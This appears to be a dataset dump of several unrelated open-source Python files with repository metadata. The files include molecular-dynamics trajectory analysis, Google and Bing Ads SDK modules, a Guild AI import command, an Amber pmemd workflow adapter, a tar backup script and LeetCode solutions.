dpi=600, bbox_inches='tight')
# extract a centroid frame from each traj ending with significant binding;
# for each compound, superpose all centroids along the SIM-binding pocket
# and save as one pdb file
centroids = {cp:[] for cp in compound}
for cp in compound:
n = len(compound2traj_name[cp])
for i in np.arange(n):
file_name = 'SUMO1_2uyz_{0}_F{1}_5000ns.h5'.format(cp, i+1)
dc = dist_dict[file_name]
bound = dc < T
if sum(bound) > 1000:
tr = traj_dict[file_name][bound]
protein_atoms = tr.topology.select('residue 32 to 56')
compound_atoms = tr.topology.select('chainid==1')
atoms_ix = np.concatenate((protein_atoms, compound_atoms))
tr.superpose(tr, frame=0, atom_indices=atoms_ix)
m = np.empty((tr.n_frames, tr.n_frames)) # rmsd matrix
for i in range(tr.n_frames):
m[i] = md.rmsd(tr, tr, i, atom_indices=atoms_ix)
#compute the centroid frame: the one closest to mean frame
centroid_ix = np.exp(-m/m.std()).sum(1).argmax()
centroids[cp].append(tr[centroid_ix])
print(file_name)
centroids_tr = md.join(centroids[cp])
centroids_tr.superpose(centroids_tr, frame=0, atom_indices=protein_atoms)
centroids_tr.save_pdb('SUMO1_2uyz_{}_bound_centroids.pdb'.format(cp))
# compute RMSD among bound_centroids
from scipy.spatial.distance import squareform
for cp in compound:
    tr = md.load('SUMO1_2uyz_{}_bound_centroids.pdb'.format(cp))
    # BUG FIX: use np.array — the bare name `array` is never imported in this
    # module, so the original line raised NameError at runtime.
    m = np.array([md.rmsd(tr, tr, i, atom_indices=protein_atoms) for i in range(len(tr))])
    # Condense the symmetric frame-by-frame RMSD matrix to pairwise values.
    m = squareform(m, checks=False)
    print(cp, min(m), max(m))
# compute atomic distances
T = 0.7
tr2uyz = md.join([md.load('SUMO1_2uyz_{}_400ns.h5'.format(i+1)) for i in range(12)])
cp = 'PHG00686'
d = [dist_dict['SUMO1_2uyz_{0}_F{1}_5000ns.h5'.format(cp, i+1)] for i in range(12)]
tr1cp = md.join([traj_dict['SUMO1_2uyz_{0}_F{1}_5000ns.h5'.format(cp, i+1)][d[i] < T] for i in range(12)])
def atom_pair_dist3(cp, pair='F36CG_R54CZ'):
    """Compare an atom-pair distance distribution with vs without compound `cp`.

    `pair` encodes two atoms as <res-letter><resid><atom>_<res-letter><resid><atom>,
    e.g. 'F36CG_R54CZ' -> residue 36 atom CG paired with residue 54 atom CZ.
    Plots the per-frame distance traces of the apo (`tr2uyz`) and bound
    (`tr1cp`) module-level trajectories side by side with horizontal
    histograms, and saves the figure as a JPEG.

    NOTE: only two-digit residue numbers are supported by the [1:3] slicing.
    """
    top = tr2uyz[0].topology
    first, second = pair.split('_')
    # '<X><nn><name>': chars 1-2 are the residue number, the rest the atom name.
    pair_ix = top.select_pairs(
        'residue=={0} and name=={1}'.format(first[1:3], first[3:]),
        'residue=={0} and name=={1}'.format(second[1:3], second[3:]))
    dist2uyz = md.compute_distances(tr2uyz, atom_pairs=pair_ix, periodic=False)
    dist1cp = md.compute_distances(tr1cp, atom_pairs=pair_ix, periodic=False)
    fig = plt.figure(figsize=(10, 4.8))
    # BUG FIX: the bare name GridSpec is never imported in this module and
    # raised NameError; pyplot re-exports it as plt.GridSpec.
    gs = plt.GridSpec(1, 2, width_ratios=[2, 1])
    ax0, ax1 = plt.subplot(gs[0]), plt.subplot(gs[1])
    ax0.plot(dist2uyz, 'C1.', markersize=1)
    ax0.plot(dist1cp, 'C0.', markersize=1, alpha=0.5)
    ax0.tick_params(labelsize=15)
    ax1.hist(dist2uyz, color='C1', bins=100, linewidth=1,
             orientation='horizontal')
    ax1.hist(dist1cp, color='C0', alpha=0.6, bins=100, linewidth=1,
             orientation='horizontal')
    ax1.tick_params(labelsize=15)
    ax1.legend(['no compound', 'with {}'.format(cp)], fontsize=15, frameon=0)
    fig.tight_layout()
    fig.savefig('SUMO1_2uyz_{0}_dist_{1}.jpg'.format(cp, pair), dpi=600)
| [
"[email protected]"
] | |
47b910274ca6546bd96488e2c3027896b833a188 | 7abd8bbbba8f401c4ce9d9ec550a0cae4a6f19ed | /bingads/v12/bulk/entities/__init__.py | afc5d3d8bf175347a50c466420cd874f00447f89 | [
"MIT"
] | permissive | stevenblanton/BingAds-Python-SDK | fd2f119db51e1a91962aa5ee4bb86344e58078a8 | 5b6e6499ae1dcc6fb8ba3032ad1a2b6ee63705c9 | refs/heads/master | 2020-09-05T12:11:04.168580 | 2019-11-01T15:49:08 | 2019-11-01T15:49:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 909 | py | __author__ = 'Bing Ads SDK Team'
__email__ = '[email protected]'
from .common import *
from .bulk_error import *
from .bulk_entity import *
from .bid_suggestion_data import *
from .unknown_bulk_entity import *
from .bulk_account import *
from .bulk_budget import *
from .bulk_campaign import *
from .bulk_ad_group import *
from .bulk_keyword import *
from .bulk_campaign_product_scope import *
from .bulk_ad_group_product_partition import *
from .bulk_campaign_negative_dynamic_search_ad_target import *
from .bulk_ad_group_dynamic_search_ad_target import *
from .bulk_ad_group_negative_dynamic_search_ad_target import *
from .ad_extensions import *
from .bulk_ads import *
from .bulk_negative_keywords import *
from .bulk_negative_sites import *
from .audiences import *
from .target_criterions import *
from .labels import *
from .bulk_offline_conversion import *
from .bulk_experiment import *
| [
"[email protected]"
] | |
61a49f9ce140730c3fb6b664ca5ac5bc8085cfb0 | 6fa701cdaa0d83caa0d3cbffe39b40e54bf3d386 | /google/ads/googleads/v6/googleads-py/google/ads/googleads/v6/services/types/media_file_service.py | d18d6a8d09b03c92f8310398e3c6a6a1be1ac137 | [
"Apache-2.0"
] | permissive | oltoco/googleapis-gen | bf40cfad61b4217aca07068bd4922a86e3bbd2d5 | 00ca50bdde80906d6f62314ef4f7630b8cdb6e15 | refs/heads/master | 2023-07-17T22:11:47.848185 | 2021-08-29T20:39:47 | 2021-08-29T20:39:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,355 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.ads.googleads.v6.enums.types import response_content_type as gage_response_content_type
from google.ads.googleads.v6.resources.types import media_file as gagr_media_file
from google.rpc import status_pb2 # type: ignore
__protobuf__ = proto.module(
package='google.ads.googleads.v6.services',
marshal='google.ads.googleads.v6',
manifest={
'GetMediaFileRequest',
'MutateMediaFilesRequest',
'MediaFileOperation',
'MutateMediaFilesResponse',
'MutateMediaFileResult',
},
)
class GetMediaFileRequest(proto.Message):
    r"""Request message for
    [MediaFileService.GetMediaFile][google.ads.googleads.v6.services.MediaFileService.GetMediaFile]
    Attributes:
        resource_name (str):
            Required. The resource name of the media file
            to fetch.
    """
    # Wire field 1: resource name of the media file to retrieve.
    resource_name = proto.Field(
        proto.STRING,
        number=1,
    )
class MutateMediaFilesRequest(proto.Message):
    r"""Request message for
    [MediaFileService.MutateMediaFiles][google.ads.googleads.v6.services.MediaFileService.MutateMediaFiles]
    Attributes:
        customer_id (str):
            Required. The ID of the customer whose media
            files are being modified.
        operations (Sequence[google.ads.googleads.v6.services.types.MediaFileOperation]):
            Required. The list of operations to perform
            on individual media file.
        partial_failure (bool):
            If true, successful operations will be
            carried out and invalid operations will return
            errors. If false, all operations will be carried
            out in one transaction if and only if they are
            all valid. Default is false.
        validate_only (bool):
            If true, the request is validated but not
            executed. Only errors are returned, not results.
        response_content_type (google.ads.googleads.v6.enums.types.ResponseContentTypeEnum.ResponseContentType):
            The response content type setting. Determines
            whether the mutable resource or just the
            resource name should be returned post mutation.
    """
    # Wire field 1: target customer ID.
    customer_id = proto.Field(
        proto.STRING,
        number=1,
    )
    # Wire field 2: repeated MediaFileOperation messages (referenced by name
    # because MediaFileOperation is declared later in this module).
    operations = proto.RepeatedField(
        proto.MESSAGE,
        number=2,
        message='MediaFileOperation',
    )
    # Wire field 3: per-operation vs all-or-nothing failure mode.
    partial_failure = proto.Field(
        proto.BOOL,
        number=3,
    )
    # Wire field 4: dry-run flag.
    validate_only = proto.Field(
        proto.BOOL,
        number=4,
    )
    # Wire field 5: how much of the mutated resource the response carries.
    response_content_type = proto.Field(
        proto.ENUM,
        number=5,
        enum=gage_response_content_type.ResponseContentTypeEnum.ResponseContentType,
    )
class MediaFileOperation(proto.Message):
    r"""A single operation to create media file.
    Attributes:
        create (google.ads.googleads.v6.resources.types.MediaFile):
            Create operation: No resource name is
            expected for the new media file.
    """
    # Wire field 1, member of the 'operation' oneof: the media file to create.
    create = proto.Field(
        proto.MESSAGE,
        number=1,
        oneof='operation',
        message=gagr_media_file.MediaFile,
    )
class MutateMediaFilesResponse(proto.Message):
    r"""Response message for a media file mutate.
    Attributes:
        partial_failure_error (google.rpc.status_pb2.Status):
            Errors that pertain to operation failures in the partial
            failure mode. Returned only when partial_failure = true and
            all errors occur inside the operations. If any errors occur
            outside the operations (e.g. auth errors), we return an RPC
            level error.
        results (Sequence[google.ads.googleads.v6.services.types.MutateMediaFileResult]):
            All results for the mutate.
    """
    # Wire field 3: aggregate partial-failure status (field numbers follow the
    # proto definition, not declaration order).
    partial_failure_error = proto.Field(
        proto.MESSAGE,
        number=3,
        message=status_pb2.Status,
    )
    # Wire field 2: one result per requested operation.
    results = proto.RepeatedField(
        proto.MESSAGE,
        number=2,
        message='MutateMediaFileResult',
    )
class MutateMediaFileResult(proto.Message):
    r"""The result for the media file mutate.
    Attributes:
        resource_name (str):
            The resource name returned for successful
            operations.
        media_file (google.ads.googleads.v6.resources.types.MediaFile):
            The mutated media file with only mutable fields after
            mutate. The field will only be returned when
            response_content_type is set to "MUTABLE_RESOURCE".
    """
    # Wire field 1: resource name of the affected media file.
    resource_name = proto.Field(
        proto.STRING,
        number=1,
    )
    # Wire field 2: the mutated resource (only with MUTABLE_RESOURCE responses).
    media_file = proto.Field(
        proto.MESSAGE,
        number=2,
        message=gagr_media_file.MediaFile,
    )
__all__ = tuple(sorted(__protobuf__.manifest))
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
d827d71d9c05c7c9a359841ae13e780b7c1620e1 | 0e0bd9d0082bf71918db9f6c92c2cefd32fd23bd | /guild/commands/runs_import.py | 354c23dc47578e9820036cf0779f49107bcd69fb | [
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] | permissive | christabella/guildai | b911d9758296503c431b571dc4696a3690f44b3d | 10d34eb9aa02aa4a374c340e75b5d44d9f3d8a25 | refs/heads/master | 2022-12-17T18:34:45.766299 | 2020-08-31T12:42:25 | 2020-08-31T12:42:25 | 294,189,964 | 0 | 0 | Apache-2.0 | 2020-09-09T18:02:13 | 2020-09-09T18:02:12 | null | UTF-8 | Python | false | false | 2,500 | py | # Copyright 2017-2020 TensorHub, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
import click
from guild import click_util
from . import runs_support
def _ac_archive(**_kw):
    # Shell-completion callback: complete the value as a directory path.
    return click_util.completion_dir()
def import_params(fn):
    """Decorator: attach the shared `import` command parameters to click
    command *fn* and return it."""
    click_util.append_params(
        fn,
        [
            runs_support.runs_arg,
            click.Argument(("archive",)),
            click.Option(
                ("-m", "--move"),
                help="Move imported runs rather than copy.",
                is_flag=True,
            ),
            click.Option(
                ("--copy-resources",),
                help="Copy resources for each imported run.",
                is_flag=True,
            ),
            runs_support.all_filters,
            click.Option(
                ("-y", "--yes"), help="Do not prompt before importing.", is_flag=True
            ),
        ],
    )
    # Attach directory-path completion to the trailing click parameter, which
    # the assert verifies is the "runs" argument after append_params runs.
    assert fn.__click_params__[-1].name == "runs", fn.__click_params__
    fn.__click_params__[-1].autocompletion = _ac_archive
    return fn
@click.command("import")
@import_params
@click.pass_context
@click_util.use_args
@click_util.render_doc
def import_runs(ctx, args):
    """Import one or more runs from `ARCHIVE`.
    `ARCHIVE` must be a directory that contains exported runs. Archive
    directories can be created using ``guild export``.
    You may use ``guild runs list --archive ARCHIVE`` to view runs in
    `ARCHIVE`.
    By default, resources are NOT copied with each imported run, but
    their links are maintained. To copy resources, use
    `--copy-resources`.
    **WARNING**: Use `--copy-resources` with care as each imported run
    will contain a separate copy of each resource!
    {{ runs_support.runs_arg }}
    If a `RUN` argument is not specified, ``:`` is assumed (all runs
    are selected).
    {{ runs_support.all_filters }}
    """
    # Local import: runs_impl is resolved only when the command actually runs.
    from . import runs_impl
    runs_impl.import_(args, ctx)
| [
"[email protected]"
] | |
af0407d686f5be807f2d3d4b938ec56483a3f89e | d6b0bc433b260b5d519d73087d5df46aa516fcdd | /biobb_adapters/pycompss/biobb_amber/pmemd/pmemd_mdrun.py | e94945a6809b7c30cc12c1d92b7e2ea6151423f4 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | bioexcel/biobb_adapters | b5442fe953b90be4e66faf3460b4a88a40e6d448 | 3daa84ba83a7951add017dd0f05dc361aa99dfe5 | refs/heads/master | 2023-08-14T08:46:39.323257 | 2023-08-02T09:05:21 | 2023-08-02T09:05:21 | 157,351,268 | 0 | 2 | Apache-2.0 | 2023-04-01T14:56:43 | 2018-11-13T09:07:36 | Common Workflow Language | UTF-8 | Python | false | false | 3,420 | py | # Python
import os
import sys
import traceback
# Pycompss
from pycompss.api.task import task
from pycompss.api.parameter import FILE_IN, FILE_OUT
from pycompss.api.multinode import multinode
from pycompss.api.constraint import constraint
# Adapters commons pycompss
from biobb_adapters.pycompss.biobb_commons import task_config
# Wrapped Biobb
from biobb_amber.pmemd.pmemd_mdrun import PmemdMDRun # Importing class instead of module to avoid name collision
# Task-tuning knobs, read from the environment once at import time.
task_time_out = int(os.environ.get('TASK_TIME_OUT', 0))
computing_nodes = str(os.environ.get('TASK_COMPUTING_NODES', "1"))
computing_units = str(os.environ.get('TASK_COMPUTING_UNITS', "1"))
gpu_units = str(os.environ.get('TASK_GPU_UNITS', "0"))
# PyCOMPSs task declaration: CPU/GPU resource constraints, multi-node layout,
# and per-path directionality (FILE_IN inputs, FILE_OUT outputs).
@constraint(processors=[{'processorType':'CPU', 'computingUnits':computing_units}, {'processorType':'GPU', 'computingUnits':gpu_units}])
@multinode(computing_nodes=computing_nodes)
@task(input_top_path=FILE_IN, input_crd_path=FILE_IN, output_log_path=FILE_OUT, output_traj_path=FILE_OUT, output_rst_path=FILE_OUT, input_mdin_path=FILE_IN, input_cpin_path=FILE_IN, input_ref_path=FILE_IN, output_cpout_path=FILE_OUT, output_cprst_path=FILE_OUT, output_mdinfo_path=FILE_OUT,
on_failure="IGNORE", time_out=task_time_out)
def _pmemdmdrun(input_top_path, input_crd_path, output_log_path, output_traj_path, output_rst_path, input_mdin_path, input_cpin_path, input_ref_path, output_cpout_path, output_cprst_path, output_mdinfo_path, properties, **kwargs):
    """PyCOMPSs task body: configure multi-node settings, then run PmemdMDRun."""
    task_config.config_multinode(properties)
    try:
        PmemdMDRun(input_top_path=input_top_path, input_crd_path=input_crd_path, output_log_path=output_log_path, output_traj_path=output_traj_path, output_rst_path=output_rst_path, input_mdin_path=input_mdin_path, input_cpin_path=input_cpin_path, input_ref_path=input_ref_path, output_cpout_path=output_cpout_path, output_cprst_path=output_cprst_path, output_mdinfo_path=output_mdinfo_path, properties=properties, **kwargs).launch()
    except Exception as e:
        # Log the full traceback in the worker before re-raising.
        traceback.print_exc()
        raise e
    finally:
        # Flush so the task's output is captured before the worker exits.
        sys.stdout.flush()
        sys.stderr.flush()
def pmemd_mdrun(input_top_path, input_crd_path, output_log_path, output_traj_path, output_rst_path, input_mdin_path=None, input_cpin_path=None, input_ref_path=None, output_cpout_path=None, output_cprst_path=None, output_mdinfo_path=None, properties=None, **kwargs):
    """Launch the PmemdMDRun task unless all declared outputs already exist.

    Restart/skip guard: when every output path is either None or an existing
    non-empty file, the task is assumed already done and is not re-submitted.
    """
    if (output_log_path is None or (os.path.exists(output_log_path) and os.stat(output_log_path).st_size > 0)) and \
        (output_traj_path is None or (os.path.exists(output_traj_path) and os.stat(output_traj_path).st_size > 0)) and \
        (output_rst_path is None or (os.path.exists(output_rst_path) and os.stat(output_rst_path).st_size > 0)) and \
        (output_cpout_path is None or (os.path.exists(output_cpout_path) and os.stat(output_cpout_path).st_size > 0)) and \
        (output_cprst_path is None or (os.path.exists(output_cprst_path) and os.stat(output_cprst_path).st_size > 0)) and \
        (output_mdinfo_path is None or (os.path.exists(output_mdinfo_path) and os.stat(output_mdinfo_path).st_size > 0)) and \
        True:
        print("WARN: Task PmemdMDRun already executed.")
    else:
        _pmemdmdrun( input_top_path, input_crd_path, output_log_path, output_traj_path, output_rst_path, input_mdin_path, input_cpin_path, input_ref_path, output_cpout_path, output_cprst_path, output_mdinfo_path, properties, **kwargs) | [
"[email protected]"
] | |
7be70ac3312c262cb16fc7fdd8dcb45124a48f14 | d2b2023261ccdcaf560a2e7b0bab13ecdedacfc9 | /03/fullbackup.py | 00cb6631683557864d36d5b2b9b06ca824c29799 | [] | no_license | lilyef2000/lesson | a9d96ffc19f68fa3f044f240de6496b6d69394f6 | 2a5abb00b9bbb8bb36602ea6e1e8c464accc0759 | refs/heads/master | 2021-01-10T08:41:14.524421 | 2016-01-01T18:04:04 | 2016-01-01T18:04:04 | 46,460,003 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 879 | py | #!/usr/bin/python
import sys,os,time,logger
# Path to back up, taken from the first CLI argument (Python 2 script).
source_file = sys.argv[1]
# Basename of the source path, used to name the archive.
formated_source_file = source_file.split('/')[-1]
backup_dir = '/home/Administrator/lesson/backup/'
# Timestamped archive path: <backup_dir><basename>_YYYYmmddHHMMSS.tgz
backup_to_file = '''%s%s_%s.tgz'''% (backup_dir,formated_source_file,time.strftime("%Y%m%d%H%M%S",time.localtime()))
def run_backup(runtime='now',exclude_file_name='None'):
    """Create a gzipped tar backup of source_file and log the outcome.

    With exactly 4 CLI args and '-X <file>' the tar exclude-file mode is used;
    otherwise a plain archive is created. The `runtime` parameter is unused and
    `exclude_file_name` is overwritten from argv in exclude mode.
    """
    if len(sys.argv) == 4:
        print '--------exclude file mode--------'
        if sys.argv[2] == '-X':
            exclude_file_name = sys.argv[3]
            backup_cmd = "tar -cvzfX %s %s %s " %(backup_to_file,exclude_file_name,source_file)
        # NOTE(review): if 4 args are given but argv[2] != '-X', backup_cmd is
        # never assigned and os.system() below raises NameError — needs a guard.
    else:
        print '--------Normal mode:--------'
        backup_cmd = "tar -cvzf %s %s |wc -l" %(backup_to_file,source_file)
    # os.system returns the shell exit status; 0 means tar succeeded.
    run_command = os.system(backup_cmd)
    if run_command == 0:
        logger.record_log('Full Backup','Success','N/A','test')
    else:
        logger.record_log('Full Backup','Failure','N/A','test')
run_backup()
| [
"[email protected]"
] | |
85dbdd459b8e5552ad1d55043b0a1f5779b84c91 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_20926.py | 194a6671b01c6bb8bdc4a0d1f301faf7b48d8ed5 | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32 | py | # Modifying sys.path
PYTHONPATH
| [
"[email protected]"
] | |
c82afac573bf870007f2a26a2677f45d8e51d99c | 04ae1836b9bc9d73d244f91b8f7fbf1bbc58ff29 | /1233/solution.py | c47461e1a3ab14eb3051ffb577ac9f8ff8d4de5e | [] | no_license | zhangruochi/leetcode | 6f739fde222c298bae1c68236d980bd29c33b1c6 | cefa2f08667de4d2973274de3ff29a31a7d25eda | refs/heads/master | 2022-07-16T23:40:20.458105 | 2022-06-02T18:25:35 | 2022-06-02T18:25:35 | 78,989,941 | 14 | 6 | null | null | null | null | UTF-8 | Python | false | false | 1,365 | py | class Node():
    def __init__(self, str_):
        # Wrap a string; equality, hashing and repr all delegate to it.
        self.str_ = str_
    def __eq__(self, other):
        # Equal when the wrapped strings match. NOTE(review): assumes `other`
        # is also a Node; a plain str on the right raises AttributeError.
        return self.str_ == other.str_
def __repr__(self):
return self.str_
def __repr__(self):
return self.str_
    def __hash__(self):
        # Hash delegates to the wrapped string, consistent with __eq__.
        return hash(self.str_)
    def __call__(self,str_):
        # Calling an instance builds a fresh Node, mirroring the constructor.
        # NOTE(review): not referenced anywhere in this file's visible code.
        return Node(str_)
class Solution:
    def removeSubfolders(self, folder: List[str]) -> List[str]:
        """Return the folders that are not sub-folders of another listed folder.

        Builds a trie of '/'-separated path segments, marks each complete
        folder with a terminal sentinel, then walks the trie depth-first:
        as soon as a marked node is reached its path is emitted and the
        subtree below it (all of its sub-folders) is skipped.

        Fixes vs original: removed a stray debug print of the parsed input,
        and dropped the needless Node wrapper class (plain segment strings
        behave identically as trie keys). Output order is unchanged.

        Time and space: O(total length of all paths).
        """
        TERMINAL = "#"  # sentinel key marking the end of a listed folder
        trie = {}
        for path in folder:
            node = trie
            for segment in path.strip("/").split("/"):
                node = node.setdefault(segment, {})
            node[TERMINAL] = TERMINAL
        res = []
        def dfs(node, parts):
            # A terminal here means `parts` spells a listed folder; anything
            # deeper is a sub-folder and must be dropped.
            if TERMINAL in node:
                res.append("/" + "/".join(parts))
                return
            for segment in node:
                parts.append(segment)
                dfs(node[segment], parts)
                parts.pop()
        dfs(trie, [])
        return res
| [
"[email protected]"
] | |
3259d0615171353e16e44fb0506a5558587028c0 | d037002f9d2b383ef84686bbb9843dac8ee4bed7 | /tutorials/Trash/Distributed-DRL/torch/sac_test/utils/environment.py | c86069ea34cea9e7eb5b64d4846270b3babd3d96 | [
"MIT"
] | permissive | ICSL-hanyang/Code_With_RL | 4edb23ca24c246bb8ec75fcf445d3c68d6c40b6d | 1378996e6bf6da0a96e9c59f1163a635c20b3c06 | refs/heads/main | 2023-08-15T18:37:57.689950 | 2021-10-18T07:31:59 | 2021-10-18T07:31:59 | 392,944,467 | 0 | 0 | null | 2021-08-05T07:20:57 | 2021-08-05T07:20:56 | null | UTF-8 | Python | false | false | 971 | py | import gym
class Environment:
    """Thin Gym wrapper that tracks whether an episode is currently running."""
    def __init__(self,env_name):
        self.env = gym.make(env_name)
        # First dimension of the observation shape. NOTE(review): assumes a
        # 1-D observation space — confirm for image-based envs.
        self.state_dim = self.env.observation_space.shape[0]
        self._max_episode_steps = self.env._max_episode_steps
        # True only between reset() and episode termination.
        self.can_run = False
        self.state = None
        if type(self.env.action_space) == gym.spaces.box.Box : #Continuous
            self.action_dim = self.env.action_space.shape[0]
            self.is_discrete = False
        else :
            self.action_dim = self.env.action_space.n
            self.is_discrete = True
    def reset(self):
        # Illegal while an episode is already in progress.
        assert not self.can_run
        self.can_run = True
        self.state = self.env.reset()
        return self.state
    def step(self,action):
        # Only legal after reset() and before the episode has ended.
        assert self.can_run
        next_state, reward, done, info = self.env.step(action)
        self.state = next_state
        if done == True:
            self.can_run = False
        return next_state, reward, done, info | [
"[email protected]"
] | |
b55e30d6f12b49a52c2c808328cfba62b35668cb | 71711bd2c11a3c0cbbc99bcfa78384d005e07828 | /puct_mcts/datasets.py | f2aa99600a387a45d927073b70ec24d3e7ff95c7 | [
"BSD-3-Clause"
] | permissive | kastnerkyle/exploring_species_counterpoint | 9365b2485cd227e375521f769ba1bfbd62c7b629 | dda762463e64036adeba7efd46c51daaaf906019 | refs/heads/master | 2021-09-13T10:55:03.096300 | 2018-04-28T19:00:21 | 2018-04-28T19:00:21 | 103,225,538 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14 | py | ../datasets.py | [
"[email protected]"
] | |
e5679a098872822f28be752dec6bb6519196d5b7 | 8a5ab3d33e3b653c4c64305d81a85f6a4582d7ac | /PySide/QtCore/QTimer.py | 5e91243992b9f324a3a089a65f93db3242e8a538 | [
"Apache-2.0"
] | permissive | sonictk/python-skeletons | be09526bf490856bb644fed6bf4e801194089f0d | 49bc3fa51aacbc2c7f0c7ab86dfb61eefe02781d | refs/heads/master | 2020-04-06T04:38:01.918589 | 2016-06-09T20:37:43 | 2016-06-09T20:37:43 | 56,334,503 | 0 | 0 | null | 2016-04-15T16:30:42 | 2016-04-15T16:30:42 | null | UTF-8 | Python | false | false | 1,511 | py | # encoding: utf-8
# module PySide.QtCore
# from /corp.blizzard.net/BFD/Deploy/Packages/Published/ThirdParty/Qt4.8.4/2015-05-15.163857/prebuilt/linux_x64_gcc41_python2.7_ucs4/PySide/QtCore.so
# by generator 1.138
# no doc
# no imports
from QObject import QObject
class QTimer(QObject):
    """Generated PySide binding stub for Qt's QTimer (repetitive and
    single-shot timers).

    Produced by the skeleton generator from the compiled QtCore
    extension; every body below is a placeholder and the real
    implementation lives in QtCore.so.
    """
    def interval(self, *args, **kwargs): # real signature unknown
        pass
    def isActive(self, *args, **kwargs): # real signature unknown
        pass
    def isSingleShot(self, *args, **kwargs): # real signature unknown
        pass
    def killTimer(self, *args, **kwargs): # real signature unknown
        pass
    def setInterval(self, *args, **kwargs): # real signature unknown
        pass
    def setSingleShot(self, *args, **kwargs): # real signature unknown
        pass
    def singleShot(self, *args, **kwargs): # real signature unknown
        pass
    def start(self, *args, **kwargs): # real signature unknown
        pass
    def startTimer(self, *args, **kwargs): # real signature unknown
        pass
    def stop(self, *args, **kwargs): # real signature unknown
        pass
    def timerEvent(self, *args, **kwargs): # real signature unknown
        pass
    def timerId(self, *args, **kwargs): # real signature unknown
        pass
    def __init__(self, *more): # real signature unknown; restored from __doc__
        """ x.__init__(...) initializes x; see help(type(x)) for signature """
        pass
    # Stub class attributes; populated by the real extension module at runtime.
    staticMetaObject = None
    timeout = None
    __new__ = None
| [
"[email protected]"
] | |
800613bb979e2a651e7833167d3b6536f748963a | 699add6df73ad158b8ebeb5f9de4aada5820f205 | /facebook/app/posts/models/comments.py | 51bab010f0aef4c5c779bd1f65e15e568916fbfe | [] | no_license | ricagome/Api-Facebook-Clone | 4f035ad280e6cb48d375fd87a9f62eecce67eb51 | fae5c0b2e388239e2e32a3fbf52aa7cfd48a7cbb | refs/heads/main | 2023-08-17T12:34:33.379017 | 2021-10-05T21:23:32 | 2021-10-05T21:23:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 694 | py | """Comment model."""
# Django
from django.db import models
# Utilities
from app.utils.models import FbModel
class Comment(FbModel):
    """A text comment left by a user (through one of their profiles) on a post."""
    # Author of the comment and the profile it was posted from.
    user = models.ForeignKey('users.User', on_delete=models.CASCADE)
    profile = models.ForeignKey('users.Profile', on_delete=models.CASCADE)
    # Commented post; CASCADE removes comments together with their post.
    post = models.ForeignKey('posts.Post', on_delete=models.CASCADE)
    text = models.TextField(help_text='write a comment', max_length=250)
    # Reaction counter -- presumably incremented elsewhere; TODO confirm.
    reactions = models.IntegerField(default=0)
    def __str__(self):
        """Return '@<username> has commented <text> on <post>'."""
        return '@{} has commented {} on {}'.format(
            self.user.username,
            self.text, self.post)
"[email protected]"
] | |
5483a62a0289eaf03b82b517c8e78dd11f7e8a9d | 4a2f163e603f90d5b9a4b2a100d7bc7bc77d1c95 | /predicting_biological_response/hemy_example.py | 401b7f3d5dd2f883930c7bfdf5ca5cfa2b058519 | [] | no_license | tusonggao/data_cck | d781334bd1d425f6ecd613ebdb194835846e3adb | 91d48589e8431fd00d70348dcb049c52fdcd2c7f | refs/heads/master | 2020-04-09T03:59:09.931284 | 2020-01-26T15:54:14 | 2020-01-26T15:54:14 | 160,005,725 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 155 | py | # https://blog.csdn.net/data_scientist/article/details/79036382
# https://blog.csdn.net/Gin077/article/details/84339790
# https://github.com/rushter/heamy
| [
"[email protected]"
] | |
88e7be6d96ec8e784aba5e12b0692d4c5beb1949 | 2db7597686f33a0d700f7082e15fa41f830a45f0 | /Python/LeetCode2.0/DP/72.Edit Distance.py | b071302d4d3bdf3daf32936c19f8404f75c65131 | [] | no_license | Leahxuliu/Data-Structure-And-Algorithm | 04e0fc80cd3bb742348fd521a62bc2126879a70e | 56047a5058c6a20b356ab20e52eacb425ad45762 | refs/heads/master | 2021-07-12T23:54:17.785533 | 2021-05-17T02:04:41 | 2021-05-17T02:04:41 | 246,514,421 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,595 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# @Time : 2020/05/09
'''
input: two words: str; the length of word is from 0 to inf
output: int; the number of modify steps
corner case:
one of the word is ‘’ → len(word2)
both words are ‘’ → 0
Method - DP
Steps:
build DP table; the size of table is (len(word1) + 1)* (len(word2) + 1)
dp[i][j]: the optimal solution when the size of word1 is i, the size of word2 is j
dp[i][j] = dp[i-1][j-1], word1[i - 1] != word2[j - 1]
= min(dp[i][j-1], dp[i-1][j],dp[i-1][j-1]) + 1, word1[i - 1] == word2[j - 1]
result is dp[len(word2)][len(word1)]
base case:
dp[0][j] = j
dp[i][0] = i
Time Complexity: O(NM), N is the length of word1 and M is the length of word2
Space Complexity: O(NM), DP table’s size
'''
